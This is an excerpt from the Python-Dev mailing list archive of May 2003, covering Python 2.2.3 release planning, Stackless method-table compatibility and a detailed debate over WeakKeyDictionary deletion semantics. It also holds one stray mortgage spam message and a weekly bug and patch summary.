> Jeremy
> 

Should patches just go to sourceforge's "parser/compiler" category, or 
will that create too much confusion?




From jeremy@zope.com  Fri May 23 20:44:14 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 23 May 2003 15:44:14 -0400
Subject: [Python-Dev] Introduction
In-Reply-To: <Pine.LNX.4.44.0305231443070.8377-100000@oblivion.cathoderaymission.net>
References: <Pine.LNX.4.44.0305231443070.8377-100000@oblivion.cathoderaymission.net>
Message-ID: <1053719054.28074.13.camel@slothrop.zope.com>

On Fri, 2003-05-23 at 15:44, logistix wrote:
> Should patches just go to sourceforge's "parser/compiler" category, or 
> will that create too much confusion?

I think that would be fine.  We don't have a lot of parser/compiler
patches.

Jeremy




From tismer@tismer.com  Fri May 23 23:54:24 2003
From: tismer@tismer.com (Christian Tismer)
Date: Sat, 24 May 2003 00:54:24 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <k7chn0hx.fsf@python.net>
References: <3EC579B4.9000303@tismer.com>	<200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net>	<3EC91EA0.5090105@tismer.com>	<200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net>	<3EC94A92.2040604@tismer.com>	<200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net>	<3ECA3DCB.50306@tismer.com>	<200305201931.h4KJUuT21506@pcp02138704pcs.reston01.va.comcast.net>	<3ECACD60.10503@tismer.com>	<200305231439.h4NEdAu26309@pcp02138704pcs.reston01.va.comcast.net> <k7chn0hx.fsf@python.net>
Message-ID: <3ECEA6A0.2020206@tismer.com>

Thomas Heller wrote:
>>>>The other is the new style where the PyMethodDef
>>>>array is in tp_methods, and is scanned once by PyType_Ready.
>>>
>>>Right, again. Now, under the hopeful assumption that every
>>>sensible extension module that has some types to publish also
>>>does this through its module dictionary, I would have the
>>>opportunity to cause PyType_Ready being called early enough
>>>to modify the method table, before any of its methods is used
>>>at all.
>>
>>Dangerous assumption!  It's not inconceivable that a class would
>>instantiate some of its own classes as part of its module
>>initialization.

First time that I saw this.
I do agree that it is possible to break every compatibility
scheme. Especially in your module's case, I would not assume
that anybody would consider not to use the most recent version
and compile it against the most recent sources?
The topic I'm talking about is old code which should continue
to run.

> I do not really know what you are talking about here, but that
> assumption is violated by the ctypes module.
> It has a number of metaclasses implemented in C, neither of them
> is exposed in the module dictionary, and there *have been* types which
> were not exposed, because they are only used internally.

Hmm. Ok. Then I am really intersted if you have an idea,
how to solve this efficiently.
My current solution is augmenting method tables by sibling
elements, which is a) not nice and b) involves extra flags
in ml_flags, which is not as efficient as possible.
Martin proposed to grow a second method table and to maintain
it in parallel. This is possible, but also seems to involve
quite some runtime overhead. What I'm seeking for is a place
that gives a secure solution, without involving code that
is executed, frequently.

On the other hand, this issue is about *most* foreign, old
code. I think I could stand if the one or the other module
simply requires to be re-compiled with the current stackless
version, if this doesn't mean to re-compile everything.

ciao - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/




From tismer@tismer.com  Sat May 24 00:08:40 2003
From: tismer@tismer.com (Christian Tismer)
Date: Sat, 24 May 2003 01:08:40 +0200
Subject: [Python-Dev] Need advice, maybe support
In-Reply-To: <200305231439.h4NEdAu26309@pcp02138704pcs.reston01.va.comcast.net>
References: <3EC579B4.9000303@tismer.com> <200305182104.h4IL4eY17830@pcp02138704pcs.reston01.va.comcast.net> <3EC91EA0.5090105@tismer.com> <200305192047.h4JKldW19641@pcp02138704pcs.reston01.va.comcast.net> <3EC94A92.2040604@tismer.com> <200305192136.h4JLaOX20032@pcp02138704pcs.reston01.va.comcast.net> <3ECA3DCB.50306@tismer.com> <200305201931.h4KJUuT21506@pcp02138704pcs.reston01.va.comcast.net> <3ECACD60.10503@tismer.com> <200305231439.h4NEdAu26309@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3ECEA9F8.9000007@tismer.com>

Guido van Rossum wrote:

[me about time of type initialization]

> Dangerous assumption!  It's not inconceivable that a class would
> instantiate some of its own classes as part of its module
> initialization.

But we agree that an extension would somehow call into the
core to initialize its types/classes.

>>For instance,
>>a modified, new-style method table might be required to always
>>start with a dummy entry, where the flags word is completely
>>-1, to signal having been converted to new-style.
> 
> 
> Why so drastic?  You could just set a reserved bit.f

Doesn't matter. WHat I want is, that at initialization time,
it is very clear what to initialize and how. At run-time,
I don't want anything to remain that slows matters down.
Therefore, creating an invalid slot for method tables
was kind of an idea to signal that there is some special
attention needed during method initialization.

...

>>Except for module objects, this seems to be right. I've run
>>Python against a lot of Python modules, but none seems
>>to call Py_FindMethod with a self parameter of NULL.
> 
> 
> I don't think it would be safe to do so.

Further analalysis has proven that you're right.

[more theoretical stuff, maybe not trustworthy without verification]

> OK, two bits you shall have.  Don't spend them all at once!

Took them, chewing on them.

>>Thanks so much for being so supportive -- chris
> 
> Anything to keep actual stackless support out of the core. :-)

Ahhh, that's the reason behind the generous intention? :-))
Ok with me, I got my two bits.

But there is something else that might be interesting for
very many Python users. Not yet announced, but you are
invited to my EuroPy talk.

cheers - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/




From zujyjbiu8@hotmail.com  Sat May 24 09:00:56 2003
From: zujyjbiu8@hotmail.com (Juliana Lutz)
Date: Sat, 24 May 03 08:00:56 GMT
Subject: [Python-Dev] Save thousands and refinance your home now! au
Message-ID: <y5p7u$z$s-$d@mi2mqrnax.z5>

This is a multi-part message in MIME format.

--24A_EAAEBD_3D
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

FREE MORTGAGE QUOTE & BEST POSSIBLE RATES !
-------------------------------------------

There are over 89,000 mortgage companies in the U.S., which means the 
process of finding the best loan for you can be a very difficult one.Let 
us do the hard work for you!

Simply spend 1 minute to fill out the short form, then press the submit 
button, and we take it from there... finding the best deals possible, 
and getting the lenders to contact you! It's short, it's simple, it's 
free, and it will save you thousands of dollars!

* Home Improvement, Refinance, Second Mortgage, Home Equity Loans, and 
More! Even with less than perfect or NO credit!

You will qualify for the best possible rate. Do NOT miss the chance to 
refinance at record low rates, so act now...

http://www.mortage-area.com/3/index.asp?RefID=3D383102 











remove me
http://www.mortage-area.com/Auto/index.htm





k zxrclz
affnqjhdv g
oqx eddtdr vnqlv mempghs
ttw glyivtltei ifulxbj yi
 rial
--24A_EAAEBD_3D--



From niemeyer@conectiva.com  Sat May 24 16:26:12 2003
From: niemeyer@conectiva.com (Gustavo Niemeyer)
Date: Sat, 24 May 2003 12:26:12 -0300
Subject: [Python-Dev] RELEASED Python 2.2.3c1
In-Reply-To: <3ECE3677.1030500@python.org>
References: <9CF2178A-8D13-11D7-A3D6-0030655234CE@cwi.nl> <3ECE3677.1030500@python.org>
Message-ID: <20030524152612.GA22309@ibook.distro.conectiva>

Hi Barry!

> >Oops, that suddenly went *very* fast, I though I had until the weekend...
> 
> But probably not as fast as it should have.  I had fun reading checkin 
> comments like (paraphrasing), "this change is probably important enough 
> for a 2.2.3 release" dated from December of last year. :)

Indeed. I'd like to have worked more on Python 2.2.3. Unfortunately,
Conectiva Linux has been released just a few weeks ago, and my free time
suddenly vanished in that period.

> >Is there a chance I could get #723495 still in before 2.2.3 final? I was 
> >also hoping to find a fix for #571343, but I don't have a patch yet 
> >(although I'll try to get one up in the next few hours).
> 
> I think it would be fine to get these into 2.2.3 final.

I have some time this weekend to work on Python. Do you think it'd be ok
to backport some of the fixes we have introduced in the regular
expression engine in 2.3 to 2.2.3, or is it too late? We have a sf patch
open about that, but I'd like to port only the changes that don't
require major changes in the engine.

Also, have you seen the message about urllib2 I sent a few days ago?
Would that be something important to have in 2.2.3 (or even in 2.3)?

Do you plan to produce another release candidate?

Thanks!

-- 
Gustavo Niemeyer

[ 2AAC 7928 0FBF 0299 5EB5  60E2 2253 B29A 6664 3A0C ]


From martin@v.loewis.de  Sat May 24 17:01:08 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 24 May 2003 18:01:08 +0200
Subject: [Python-Dev] RELEASED Python 2.2.3c1
In-Reply-To: <20030524152612.GA22309@ibook.distro.conectiva>
References: <9CF2178A-8D13-11D7-A3D6-0030655234CE@cwi.nl>
 <3ECE3677.1030500@python.org>
 <20030524152612.GA22309@ibook.distro.conectiva>
Message-ID: <m3he7kgwqj.fsf@mira.informatik.hu-berlin.de>

Gustavo Niemeyer <niemeyer@conectiva.com> writes:

> I have some time this weekend to work on Python. Do you think it'd be ok
> to backport some of the fixes we have introduced in the regular
> expression engine in 2.3 to 2.2.3, or is it too late? We have a sf patch
> open about that, but I'd like to port only the changes that don't
> require major changes in the engine.

I strongly advise to defer such changes to 2.2.4. This is really
tricky code, and changes should ideally be reviewed by three different
experts (including the author of the changes).

> Also, have you seen the message about urllib2 I sent a few days ago?
> Would that be something important to have in 2.2.3 (or even in 2.3)?

Nothing that is not in 2.3 right now can go into 2.2.3. Only backports
of accepted changes should be applied to the 2.2 branch.

> Do you plan to produce another release candidate?

My understanding is that there was only one release candidate
planned. Changes that require another release candidate should not be
applied right now, since another release candidate won't give them the
testing that they need.

Regards,
Martin


From niemeyer@conectiva.com  Sat May 24 17:08:33 2003
From: niemeyer@conectiva.com (Gustavo Niemeyer)
Date: Sat, 24 May 2003 13:08:33 -0300
Subject: [Python-Dev] RELEASED Python 2.2.3c1
In-Reply-To: <m3he7kgwqj.fsf@mira.informatik.hu-berlin.de>
References: <9CF2178A-8D13-11D7-A3D6-0030655234CE@cwi.nl> <3ECE3677.1030500@python.org> <20030524152612.GA22309@ibook.distro.conectiva> <m3he7kgwqj.fsf@mira.informatik.hu-berlin.de>
Message-ID: <20030524160832.GB22309@ibook.distro.conectiva>

> > I have some time this weekend to work on Python. Do you think it'd be ok
> > to backport some of the fixes we have introduced in the regular
> > expression engine in 2.3 to 2.2.3, or is it too late? We have a sf patch
> > open about that, but I'd like to port only the changes that don't
> > require major changes in the engine.
> 
> I strongly advise to defer such changes to 2.2.4. This is really
> tricky code, and changes should ideally be reviewed by three different
> experts (including the author of the changes).

Ack. I'll wait until 2.2.3 is out to touch that code. I'll look for
something else to do on Python this weekend. If you need any help
with 2.2.3, please contact me.

> > Also, have you seen the message about urllib2 I sent a few days ago?
> > Would that be something important to have in 2.2.3 (or even in 2.3)?
> 
> Nothing that is not in 2.3 right now can go into 2.2.3. Only backports
> of accepted changes should be applied to the 2.2 branch.

Ok. I'll let alone 2.2.3, and fix that behavior in urllib2 for 2.3.

> > Do you plan to produce another release candidate?
> 
> My understanding is that there was only one release candidate
> planned. Changes that require another release candidate should not be
> applied right now, since another release candidate won't give them the
> testing that they need.

Agreed.

-- 
Gustavo Niemeyer

[ 2AAC 7928 0FBF 0299 5EB5  60E2 2253 B29A 6664 3A0C ]


From niemeyer@conectiva.com  Sat May 24 20:03:25 2003
From: niemeyer@conectiva.com (Gustavo Niemeyer)
Date: Sat, 24 May 2003 16:03:25 -0300
Subject: [Python-Dev] urllib2 proxy support broken?
In-Reply-To: <20030519212807.GA29002@ibook.distro.conectiva>
References: <20030519212807.GA29002@ibook.distro.conectiva>
Message-ID: <20030524190325.GA30748@ibook.distro.conectiva>

> I've just tried to use the proxy support in urllib2, and was surprised
> by the fact that it seems to be broken, at least in 2.2 and 2.3. Can
> somebody please confirm that it's really broken, so that I can prepare
> a patch?

Ok.. I have prepared a simple fix for this, and sent it to SF patch
#742823. This fix should be backwards compatible, and at the same time
allows any kind of further customization of pre-defined and user-defined
classes.

Can someone please have a look at it before I check it in?

-- 
Gustavo Niemeyer

[ 2AAC 7928 0FBF 0299 5EB5  60E2 2253 B29A 6664 3A0C ]


From barry@python.org  Sat May 24 21:49:48 2003
From: barry@python.org (Barry Warsaw)
Date: Sat, 24 May 2003 16:49:48 -0400
Subject: [Python-Dev] RELEASED Python 2.2.3c1
In-Reply-To: <m3he7kgwqj.fsf@mira.informatik.hu-berlin.de>
Message-ID: <4215F6F7-8E29-11D7-A28B-003065EEFAC8@python.org>

On Saturday, May 24, 2003, at 12:01 PM, Martin v. L=F6wis wrote:

>> Do you plan to produce another release candidate?
>
> My understanding is that there was only one release candidate
> planned. Changes that require another release candidate should not be
> applied right now, since another release candidate won't give them the
> testing that they need.

Martin's  right.  Unless Guido specifically overrides, please be ultra=20=

conservative.

-Barry



From tim_one@email.msn.com  Sun May 25 06:21:22 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Sun, 25 May 2003 01:21:22 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
In-Reply-To: <000201c32277$59041c00$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEODEKAB.tim_one@email.msn.com>

[redirected to python-dev]

[Tim]
>> Someone review this, please!  Final releases are getting close, Fred
>> (the weakref guy) won't be around until Tuesday, and the pre-patch
>> code can indeed raise spurious RuntimeErrors in the presence of
>> threads or mutating comparison functions.
>>
>> See the bug report for my confusions:  I can't see any reason for why
>> __delitem__ iterated over the keys.

[Raymond Hettinger]
> Until reading the note on threads, I didn't see the error and thought
> the original code was valid because it returned after the deletion
> instead of continuing to loop through iterkeys.

Note that one of the new tests I checked in provoked RuntimeError without
threads.

>> The new one-liner implementation is much faster, can't raise
>> RuntimeError, and should be> better-behaved in all respects wrt threads.

> Yes, that solves the OP's problem.

>> Bugfix candidate for 2.2.3 too, if someone else agrees with this
>> patch.

> The original code does its contortions to avoid raising a KeyError
> whenever the dictionary entry might have disappeared due to the
> ref count falling to zero and then a new, equal key was formed later.

Sorry, I can't picture what you're trying to say.  Show some code?  If in a
weak-keyed dict d I do

    d[k1] = v
    del k1 # last reference, so the dict mutation went away
    del d[k2]  # where k2 happens to be compare equal to what k1 was

then I claim that *should* raise KeyError, and pretty obviously so.  Note
that the other new test I checked in showed that

    del d[whatever]

never raised KeyError before; I can't see how that can be called a feature,
and if someone thinks it was they neglected to document it, or write a test
that failed when I changed the behavior <wink>.

> If the data disappeared, then, I think ref(key) will return None

No, ref(x) never returns None, regardless of what x may be.  It may raise
TypeError if x is not of a weakly referencable type, and it may raise
MemoryError if we don't have enough memory left to construct a weakref, but
those are the only things that can go wrong.

w = ref(x) followed later by w() will return None, iff x has gone away in
the meantime -- maybe that's what you're thinking of.

> which is a bummer because that is then used (in your patch)
> as a lookup key.

If x and y are two weakly-referencable objects (not necessarily distinct)
that compare equal, then

    ref(x) == ref(y)
and
    hash(ref(x)) == hash(ref(y))

so long as both ref(x)() and ref(y)() don't return None (i.e., so long as x
and y are both still alive).

Soo when I map

   del d[k1]

to

   del d.data[ref(k1)]

it will succeed if and only if d.data has a key for a still-live object, and
that key compares equal to k1; else it will raise KeyError (or maybe
TypeError if k1 is a silly key to test in a weak-keyed dict, or MemoryError
if we run out of memory).  That's what I believe it should do.

> The safest approach (until Fred re-appears) is to keep the original
> approach but use keys() instead of iterkeys().  Then, wrap the
> actual deletion in a try / except KeyError to handle a thread
> race to delete the same weakref object.

I'm not clear on what that means.  By "delete the same weakref object", do
you mean that both threads try to do

    del d[k]

with the same k and the same weak-valued dict d?  If so, then I think one of
them *should* see KeyError, exactly the same as if they tried pulling this
trick with a regular dict.

> I'm sure there is a better way and will take another look tomorrow.

Thanks for trying, but I still don't get it.  It would help if you could
show specific code that you believe worked correctly before but is broken
now.  I added two new tests showing what I believe to be code that was
broken before but works now, and no changes to the existing tests were
needed.



From python@rcn.com  Sun May 25 07:05:28 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 25 May 2003 02:05:28 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
References: <LNBBLJKPBEHFEDALKOLCKEODEKAB.tim_one@email.msn.com>
Message-ID: <001a01c32283$a4ec0fe0$125ffea9@oemcomputer>

[Raymondo]
> > The original code does its contortions to avoid raising a KeyError
> > whenever the dictionary entry might have disappeared due to the
> > ref count falling to zero and then a new, equal key was formed later.

[Timbot]
> Sorry, I can't picture what you're trying to say.  Show some code?

Python 2.3b1 (#40, Apr 25 2003, 19:06:24) [MSC v.1200 32 bit (Intel)] on win32
Type "copyright", "credits" or "license" for more information.
IDLE 0.8 -- press F1 for help
>>> class C: pass

>>> import weakref
>>> wkd = weakref.WeakKeyDictionary()
>>> del wkd[C()]
>>> # No complaints



Python 2.3b1+ (#40, May 23 2003, 00:08:36) [MSC v.1200 32 b
Type "help", "copyright", "credits" or "license" for more i
>>> class C: pass
...
>>> import weakref
>>> wkd = weakref.WeakKeyDictionary()
>>> del wkd[C()]
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "C:\PY23\lib\weakref.py", line 167, in __delitem__
    del self.data[ref(key)]
KeyError: <weakref at 006BC600; to 'instance' at 006BAA30>
>>> # Complains now.



[Raymond]
 > > If the data disappeared, then, I think ref(key) will return None

[Timbot]
> No, ref(x) never returns None, regardless of what x may be.  It may raise
> TypeError if x is not of a weakly referencable type, and it may raise
> MemoryError if we don't have enough memory left to construct a weakref, but
> those are the only things that can go wrong.

[Current version of the docs]
"""
ref( object[, callback])

Return a weak reference to object. The original object can be retrieved by calling the reference object if the referent is still
alive; if the referent is no longer alive, calling the reference object will cause None to be returned.
"""


Raymond Hettinger



From tim_one@email.msn.com  Sun May 25 07:29:02 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Sun, 25 May 2003 02:29:02 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
In-Reply-To: <001a01c32283$a4ec0fe0$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEOGEKAB.tim_one@email.msn.com>

[Raymondo]
>>> The original code does its contortions to avoid raising a KeyError
>>> whenever the dictionary entry might have disappeared due to the
>>> ref count falling to zero and then a new, equal key was formed
>>> later.

[Timbot]
>> Sorry, I can't picture what you're trying to say.  Show some code?

[Razor]
> Python 2.3b1 (#40, Apr 25 2003, 19:06:24) [MSC v.1200 32 bit (Intel)]
> on win32 Type "copyright", "credits" or "license" for more
> information. IDLE 0.8 -- press F1 for help
> >>> class C: pass
> ...
> >>> import weakref
> >>> wkd = weakref.WeakKeyDictionary()
> >>> del wkd[C()]
> >>> # No complaints

Right, and I call that a bug.  One of the new tests I checked in does
exactly that, BTW.  As I said last time, the idea that trying to delete a
key from a weak-keyed dict never raises KeyError was neither documented nor
verified by a test, so there's no reason to believe it was anything other
than a bug in the implementation of __delitem__.

> Python 2.3b1+ (#40, May 23 2003, 00:08:36) [MSC v.1200 32 b
> Type "help", "copyright", "credits" or "license" for more i
> >>> class C: pass
> ...
> >>> import weakref
> >>> wkd = weakref.WeakKeyDictionary()
> >>> del wkd[C()]
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
>   File "C:\PY23\lib\weakref.py", line 167, in __delitem__
>     del self.data[ref(key)]
> KeyError: <weakref at 006BC600; to 'instance' at 006BAA30>
> >>> # Complains now.

Right, and that's intentional, and tested now too.  It's always been the
case (and still is) that wkd[C()] raised KeyError too -- why should
__delitem__, and only __delitem__, be exempt from complaining about a
senseless operation?

>>> If the data disappeared, then, I think ref(key) will return None

>> No, ref(x) never returns None, regardless of what x may be.  It may
>> raise TypeError if x is not of a weakly referencable type, and it
>> may raise MemoryError if we don't have enough memory left to
>> construct a weakref, but those are the only things that can go wrong.

> [Current version of the docs]
> """
> ref( object[, callback])
>
> Return a weak reference to object. The original object can be
> retrieved by calling the reference object if the referent is still
> alive; if the referent is no longer alive, calling the reference
> object will cause None to be returned. """

That's what I said last time:

    w = ref(x) followed later by w() will return None, iff x has gone away
    in the meantime -- maybe that's what you're thinking of.

Note that "calling the reference object" in the docs does not mean the call
"ref(x)" itself, it means calling the object returned by ref(x) (what I
named "w" in the quote just above).



From python@rcn.com  Sun May 25 07:35:17 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 25 May 2003 02:35:17 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
References: <LNBBLJKPBEHFEDALKOLCAEOGEKAB.tim_one@email.msn.com>
Message-ID: <002b01c32287$cef99ba0$125ffea9@oemcomputer>

The old behavior for missing keys may have been a bug.
Do you care about the previous behavior for deleting 
based on equality rather than equality *and* hash?


Python 2.3b1 (#40, Apr 25 2003, 19:06:24) [MSC v.1200 32 bit (Intel)] on win32
Type "copyright", "credits" or "license" for more information.
IDLE 0.8 -- press F1 for help
>>> class One:
 def __eq__(self, other):
  return other == 1
 def __hash__(self):
  return 1492

>>> import weakref
>>> wkd = weakref.WeakKeyDictionary()
>>> o = One()
>>> wkd[o] = None
>>> len(wkd)
1
>>> del wkd[1]
>>> len(wkd)
0


Python 2.3b1+ (#40, May 23 2003, 00:08:36) [MSC v.1200 32
Type "help", "copyright", "credits" or "license" for more
>>> class One:
...     def __eq__(self, other):
...         return other == 1
...     def __hash__(self):
...         return 1492
...
>>> import weakref
>>> wkd = weakref.WeakKeyDictionary()
>>> o = One()
>>> wkd[o] = None
>>> len(wkd)
1
>>> del wkd[1]
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "C:\PY23\lib\weakref.py", line 167, in __delitem__
    del self.data[ref(key)]
TypeError: cannot create weak reference to 'int' object
>>> len(wkd)
1
>>>


Raymond Hettinger


From tim_one@email.msn.com  Sun May 25 07:48:25 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Sun, 25 May 2003 02:48:25 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
In-Reply-To: <002b01c32287$cef99ba0$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOGEKAB.tim_one@email.msn.com>

[Raymond Hettinger]
> The old behavior for missing keys may have been a bug.
> Do you care about the previous behavior for deleting
> based on equality rather than equality *and* hash?

Nope, because it was neither documented nor tested, and was behavior unique
to the WeakKeyDictionary flavor of dict -- no other flavor of dict works
that way, and it was just an accident due to the __delitem__ implementation.
Note too that it's a documented requirement of the mapping protocol that
keys that compare equal must also return equal hash values.

> Python 2.3b1 (#40, Apr 25 2003, 19:06:24) [MSC v.1200 32 bit (Intel)]
> on win32 Type "copyright", "credits" or "license" for more
> information. IDLE 0.8 -- press F1 for help
> >>> class One:
>      def __eq__(self, other):
>       return other == 1
>      def __hash__(self):
>       return 1492

> >>> import weakref
> >>> wkd = weakref.WeakKeyDictionary()
> >>> o = One()
> >>> wkd[o] = None
> >>> len(wkd)
> 1
> >>> del wkd[1]
> >>> len(wkd)
> 0

Just a case of GIGO (garbage in, garbage out) to me.

> Python 2.3b1+ (#40, May 23 2003, 00:08:36) [MSC v.1200 32
> Type "help", "copyright", "credits" or "license" for more
> >>> class One:
> ..     def __eq__(self, other):
> ..         return other == 1
> ..     def __hash__(self):
> ..         return 1492
> ..
> >>> import weakref
> >>> wkd = weakref.WeakKeyDictionary()
> >>> o = One()
> >>> wkd[o] = None
> >>> len(wkd)
> 1
> >>> del wkd[1]
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
>   File "C:\PY23\lib\weakref.py", line 167, in __delitem__
>     del self.data[ref(key)]
> TypeError: cannot create weak reference to 'int' object
> >>> len(wkd)
> 1
> >>>

As I said the first time <wink>,

    will succeed if and only if d.data has a key for a still-live object,
    and that key compares equal to k1; else it will raise KeyError
    (or maybe TypeError if k1 is a silly key to test in a weak-keyed dict,
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    or MemoryError if we run out of memory).  That's what I believe it
    should do.

I didn't add "and the hash codes are the same too" because that requirement
is part of the the mapping protocol.



From python@rcn.com  Sun May 25 07:46:41 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 25 May 2003 02:46:41 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
References: <LNBBLJKPBEHFEDALKOLCAEOGEKAB.tim_one@email.msn.com>
Message-ID: <003701c32289$66e42ec0$125ffea9@oemcomputer>

Here's the rest of the last example:

>>> class AltOne(One):
...     def __hash__(self):
...         return 1776
...
>>> del wkd[AltOne()]
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "C:\PY23\lib\weakref.py", line 167, in __delitem__
    del self.data[ref(key)]
KeyError: <weakref at 006BCB70; to 'instance' at 006C22D8>



> [Razor]

Hmm, a new moniker is born ...


[Tim]
> > Note that "calling the reference object" in the docs does not mean the call
> "ref(x)" itself, it means calling the object returned by ref(x) (what I
> named "w" in the quote just above).

Hmm,  I read the docs just a little too quickly.  
Speed reading is not all it's cracked up to be.


Raymond

#################################################################
#################################################################
#################################################################
#####
#####
#####
#################################################################
#################################################################
#################################################################


From python@rcn.com  Sun May 25 07:52:23 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 25 May 2003 02:52:23 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
References: <LNBBLJKPBEHFEDALKOLCOEOGEKAB.tim_one@email.msn.com>
Message-ID: <000201c3228a$73b3cba0$125ffea9@oemcomputer>

> As I said the first time <wink>,
> 
>     will succeed if and only if d.data has a key for a still-live object,
>     and that key compares equal to k1; else it will raise KeyError
>     (or maybe TypeError if k1 is a silly key to test in a weak-keyed dict,
>     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>     or MemoryError if we run out of memory).  That's what I believe it
>     should do.
> 
> I didn't add "and the hash codes are the same too" because that requirement
> is part of the the mapping protocol.

Okay, you've had a second review on the patch and backporting
to 2.2.3 is reasonable.  Please add a news item for the two changes
in behavior.

BTW, I wasn't trying to be difficult, I was starting from the presumption 
that Fred wasn't smoking dope when he put in that weird block of code.
Looks like the presumption was wrong ;-)


Raymond


From python@rcn.com  Sun May 25 08:08:33 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 25 May 2003 03:08:33 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
References: <LNBBLJKPBEHFEDALKOLCAEOGEKAB.tim_one@email.msn.com> <003701c32289$66e42ec0$125ffea9@oemcomputer>
Message-ID: <000901c3228c$74f0a680$125ffea9@oemcomputer>

Arghh.  One more example always arises after going to bed.

The original required only equality.  The new version requires
equality, hashability, *and* weak referencability.

Python 2.3b1 (#40, Apr 25 2003, 19:06:24) [MSC v.1200 32 bit (Intel)] on win32
Type "copyright", "credits" or "license" for more information.
IDLE 0.8 -- press F1 for help
>>> import weakref
>>> class One:
 def __eq__(self, other): return other == 1
 def __hash__(self, other):  return hash(1)
>>> wkd = weakref.WeakKeyDictionary()
>>> o = One()
>>> wkd[o] = 1
>>> len(wkd)
1
>>> del wkd[1]
>>> len(wkd)
0


Python 2.3b1+ (#40, May 23 2003, 00:08:36) [MSC v.1200 32
Type "help", "copyright", "credits" or "license" for more
>>> class One:
...     def __eq__(self,other):  return other==1
...     def __hash__(self):  return hash(1)
...
>>> import weakref
>>> wkd = weakref.WeakKeyDictionary()
>>> o = One()
>>> wkd[o] = 1
>>> len(wkd)
1
>>> del wkd[1]
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "C:\PY23\lib\weakref.py", line 167, in __delitem__
    del self.data[ref(key)]
TypeError: cannot create weak reference to 'int' object
>>> len(wkd)
1



Raymond










From skip@mojam.com  Sun May 25 13:00:28 2003
From: skip@mojam.com (Skip Montanaro)
Date: Sun, 25 May 2003 07:00:28 -0500
Subject: [Python-Dev] Weekly Python Bug/Patch Summary
Message-ID: <200305251200.h4PC0Sg08651@manatee.mojam.com>

Bug/Patch Summary
-----------------

372 open / 3658 total bugs (-30)
151 open / 2173 total patches (+12)

New Bugs
--------

IMAP4_SSL broken (2003-05-19)
	http://python.org/sf/739909
re.finditer() listed as new in 2.2.? (2003-05-19)
	http://python.org/sf/740026
test/build-failures on FreeBSD stable/current (2003-05-19)
	http://python.org/sf/740234
Can't browse methods and Classes (2003-05-20)
	http://python.org/sf/740407
MacPython-OS9 distutils breaks on OSX (2003-05-20)
	http://python.org/sf/740424
HTMLParser -- possible bug in handle_comment (2003-05-21)
	http://python.org/sf/741029
Configure does NOT set properly *FLAGS for thread support (2003-05-21)
	http://python.org/sf/741307
test_long failure (2003-05-22)
	http://python.org/sf/741806
curses support on Python-2.3b1/Tru64Unix 5.1A (2003-05-22)
	http://python.org/sf/741843
Python crashes if recursively reloading modules (2003-05-23)
	http://python.org/sf/742342
WeakKeyDictionary __delitem__ uses iterkeys (2003-05-24)
	http://python.org/sf/742860
Memory fault on complex weakref/weakkeydict delete (2003-05-24)
	http://python.org/sf/742911

New Patches
-----------

inspect.getargspec: None instead of () (2002-11-12)
	http://python.org/sf/637217
zlib.decompressobj under-described. (2002-11-18)
	http://python.org/sf/640236
Several objects don't decref tmp on failure in subtype_new (2003-03-14)
	http://python.org/sf/703666
